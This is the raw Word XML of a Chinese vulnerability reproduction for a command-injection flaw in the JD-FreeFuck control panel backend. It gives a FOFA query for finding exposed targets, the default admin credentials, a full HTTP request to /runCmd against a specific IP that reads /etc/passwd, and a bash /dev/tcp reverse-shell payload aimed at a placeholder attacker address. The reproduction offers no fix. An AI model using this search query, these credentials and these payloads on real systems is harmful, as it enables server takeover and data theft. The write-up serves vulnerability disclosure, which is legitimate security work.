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8" w:afterAutospacing="0" w:line="17" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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333333"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JD-FreeFuck 后台命令执行漏洞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一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JD-FreeFuck 存在后台命令执行漏洞，由于传参执行命令时没有对内容过滤，导致可以执行任意命令，控制服务器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二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JD-FreeFuck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三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现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1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FOFA: title="京东薅羊毛控制面板"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2573020"/>
            <wp:effectExtent l="0" t="0" r="635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2）登录界面如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5261610" cy="2637155"/>
            <wp:effectExtent l="0" t="0" r="1143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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>默认账号密码为useradmin/supermanito</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2811780"/>
            <wp:effectExtent l="0" t="0" r="635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4）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发送如下请求包执行命令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/runCmd HTTP/1.1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Host: 101.200.189.251:5678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Content-Length: 50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Pragma: no-cache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Cache-Control: no-cache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Accept: */*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X-Requested-With: XMLHttpRequest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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36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Content-Type: application/x-www-form-urlencoded; charset=UTF-8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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6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Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U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Connection: close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cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&amp;delay=500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其中 cmd 参数存在命令注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2449830"/>
            <wp:effectExtent l="0" t="0" r="635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</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反弹shell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cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&amp;delay=500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704465"/>
            <wp:effectExtent l="0" t="0" r="571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772920"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1016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修复建议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暂无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95F075"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8F95F075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910F90"/>
    <w:rsid w:val="18E10F67"/>
    <w:rsid w:val="1E305DD6"/>
    <w:rsid w:val="1E5E5B09"/>
    <w:rsid w:val="1ECD0C4B"/>
    <w:rsid w:val="20824668"/>
    <w:rsid w:val="380B3EAC"/>
    <w:rsid w:val="429029ED"/>
    <w:rsid w:val="45F64CAF"/>
    <w:rsid w:val="5C5C06F4"/>
    <w:rsid w:val="5CE419CB"/>
    <w:rsid w:val="5FF14096"/>
    <w:rsid w:val="69B51016"/>
    <w:rsid w:val="6F430152"/>
    <w:rsid w:val="78BC0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Office_11.1.0.9995_F1E327BC-269C-435d-A152-05C5408002CA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2021-04-06T08:28:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-06T09:34:09Z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2052-11.1.0.9995</vt:lpwstr>
  </property>
</Properties>
</file>